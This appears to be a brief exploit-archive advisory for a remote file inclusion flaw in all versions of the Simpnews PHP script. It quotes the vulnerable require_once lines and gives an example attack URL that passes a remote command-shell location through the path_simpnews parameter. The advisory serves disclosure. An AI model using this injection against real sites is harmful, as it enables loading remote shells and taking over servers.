All versions of Simpnews appear to still have a remote file inclusion flaw utilized via the path_simpnews variable.
2fe74ff84b4a5493d6a42012a105920e08e06244ff201e0cb391c1e9aa28ef56
# SaVSaK.CoM | SpC-x - The-BeKiR |
# Simpnews <= All version - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : Simpnews
# Credits : SpC-x - The-BeKiR
# Thanks : Ejder - FasTBoY - ERNE - RMx
# Code :
# require_once($path_simpnews.'/langchk.php');
# include_once('./language/lang_'.$act_lang.'.php');
# require_once('./includes/get_settings.inc');
# require_once('./includes/wap_get_settings.inc');
# Vulnerable :
# http://www.victim.com/Simpnews/wap_short_news.php?path_simpnews=Command-Shell